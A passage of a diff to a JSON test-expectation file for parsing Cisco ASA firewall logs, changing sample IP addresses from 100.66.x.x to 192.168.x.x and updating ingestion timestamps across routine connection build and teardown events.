"172.31.98.44", - "mapped_source_ip": "100.66.54.190", + "mapped_source_ip": "192.168.54.190", "connection_id": "11826", "source_interface": "outside", "mapped_destination_port": 1292 @@ -13605,8 +13605,8 @@ }, "destination": { "port": 8297, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1293, @@ -13646,7 +13646,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13654,8 +13654,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095052816Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297", + "ingested": "2021-12-09T13:32:20.604643800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13688,8 +13688,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13724,7 +13724,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13733,8 +13733,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095054588Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", + "ingested": "2021-12-09T13:32:20.604649200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13750,7 +13750,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11827", "source_interface": "outside", "mapped_destination_port": 1293 @@ -13767,8 +13767,8 @@ }, "destination": { "port": 8298, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1294, @@ -13808,7 +13808,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13816,8 +13816,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095056325Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298", + "ingested": "2021-12-09T13:32:20.604654600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13850,8 +13850,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13886,7 +13886,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13895,8 +13895,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095058049Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", + "ingested": "2021-12-09T13:32:20.604659900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13912,7 +13912,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11828", "source_interface": "outside", "mapped_destination_port": 1294 @@ -13934,8 +13934,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13970,7 +13970,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13981,8 +13981,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.095059822Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", + "ingested": "2021-12-09T13:32:20.604665300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14014,8 +14014,8 @@ }, "destination": { "port": 8299, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1295, @@ -14055,7 +14055,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14063,8 +14063,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095061585Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299", + "ingested": "2021-12-09T13:32:20.604670700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14097,8 +14097,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14133,7 +14133,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14142,8 +14142,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095063345Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", + "ingested": "2021-12-09T13:32:20.604676200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14159,7 +14159,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11829", "source_interface": "outside", "mapped_destination_port": 1295 @@ -14176,8 +14176,8 @@ }, "destination": { "port": 8300, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1296, @@ -14217,7 +14217,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14225,8 +14225,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095065149Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300", + "ingested": "2021-12-09T13:32:20.604681600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14259,8 +14259,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14295,7 +14295,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14304,8 +14304,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095066875Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", + "ingested": "2021-12-09T13:32:20.604687100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14321,7 +14321,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11830", "source_interface": "outside", "mapped_destination_port": 1296 @@ -14343,8 +14343,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14379,7 +14379,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14390,8 +14390,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.095068592Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", + "ingested": "2021-12-09T13:32:20.604690900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14428,8 +14428,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14464,7 +14464,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14475,8 +14475,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.095070333Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", + "ingested": "2021-12-09T13:32:20.604695200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14513,8 +14513,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14549,7 +14549,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14560,8 +14560,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.095072079Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", + "ingested": "2021-12-09T13:32:20.604699900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14593,8 +14593,8 @@ }, "destination": { "port": 8301, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1297, @@ -14634,7 +14634,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14642,8 +14642,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095073958Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301", + "ingested": "2021-12-09T13:32:20.604704500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14676,8 +14676,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14712,7 +14712,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14721,8 +14721,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095075685Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", + "ingested": "2021-12-09T13:32:20.604708Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14738,7 +14738,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11831", "source_interface": "outside", "mapped_destination_port": 1297 @@ -14755,8 +14755,8 @@ }, "destination": { "port": 8302, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1298, @@ -14796,7 +14796,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14804,8 +14804,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095077426Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302", + "ingested": "2021-12-09T13:32:20.604712200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14838,8 +14838,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14874,7 +14874,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14883,8 +14883,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095079166Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", + "ingested": "2021-12-09T13:32:20.604717700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14900,7 +14900,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11832", "source_interface": "outside", "mapped_destination_port": 1298 @@ -14922,8 +14922,8 @@ }, "source": { "port": 53, - "address": "100.66.179.9", - "ip": "100.66.179.9" + "address": "192.168.179.9", + "ip": "192.168.179.9" }, "tags": [ "preserve_original_event" @@ -14958,7 +14958,7 @@ "localhost" ], "ip": [ - "100.66.179.9", + "192.168.179.9", "172.31.98.44" ] }, @@ -14967,8 +14967,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095080912Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604722800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -14984,7 +14984,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.179.9", + "mapped_source_ip": "192.168.179.9", "connection_id": "11833", "source_interface": "outside", "mapped_destination_port": 56132 @@ -15006,8 +15006,8 @@ }, "source": { "port": 53, - "address": "100.66.179.9", - "ip": "100.66.179.9" + "address": "192.168.179.9", + "ip": "192.168.179.9" }, "tags": [ "preserve_original_event" @@ -15042,7 +15042,7 @@ "localhost" ], "ip": [ - "100.66.179.9", + "192.168.179.9", "172.31.98.44" ] }, @@ -15052,8 +15052,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095082702Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", + "ingested": "2021-12-09T13:32:20.604726400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15090,8 +15090,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15126,7 +15126,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15137,8 +15137,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.095084487Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", + "ingested": "2021-12-09T13:32:20.604730500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15170,8 +15170,8 @@ }, "destination": { "port": 8303, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1299, @@ -15211,7 +15211,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15219,8 +15219,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095086211Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303", + "ingested": "2021-12-09T13:32:20.604735300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15253,8 +15253,8 @@ }, "source": { "port": 80, - "address": "100.66.247.99", - "ip": "100.66.247.99" + "address": "192.168.247.99", + "ip": "192.168.247.99" }, "tags": [ "preserve_original_event" @@ -15289,7 +15289,7 @@ "localhost" ], "ip": [ - "100.66.247.99", + "192.168.247.99", "172.31.98.44" ] }, @@ -15298,8 +15298,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095087942Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", + "ingested": "2021-12-09T13:32:20.604739100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15315,7 +15315,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.247.99", + "mapped_source_ip": "192.168.247.99", "connection_id": "11834", "source_interface": "outside", "mapped_destination_port": 1299 @@ -15332,8 +15332,8 @@ }, "destination": { "port": 8304, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1300, @@ -15373,7 +15373,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15381,8 +15381,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095089683Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304", + "ingested": "2021-12-09T13:32:20.604743500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15415,8 +15415,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15451,7 +15451,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15460,8 +15460,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095091477Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", + "ingested": "2021-12-09T13:32:20.604748900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15477,7 +15477,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11835", "source_interface": "outside", "mapped_destination_port": 1300 @@ -15499,8 +15499,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15535,7 +15535,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15546,8 +15546,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.095093346Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", + "ingested": "2021-12-09T13:32:20.604754400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15584,8 +15584,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15620,7 +15620,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15631,8 +15631,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.095095112Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", + "ingested": "2021-12-09T13:32:20.604759800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15664,8 +15664,8 @@ }, "destination": { "port": 8305, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1301, @@ -15705,7 +15705,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15713,8 +15713,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095096898Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305", + "ingested": "2021-12-09T13:32:20.604765100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15747,8 +15747,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15783,7 +15783,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15792,8 +15792,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095098659Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", + "ingested": "2021-12-09T13:32:20.604770500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15809,7 +15809,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11836", "source_interface": "outside", "mapped_destination_port": 1301 @@ -15826,8 +15826,8 @@ }, "destination": { "port": 8306, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1302, @@ -15867,7 +15867,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15875,8 +15875,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095101016Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306", + "ingested": "2021-12-09T13:32:20.604775800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15909,8 +15909,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15945,7 +15945,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15954,8 +15954,8 @@ }, "event": { 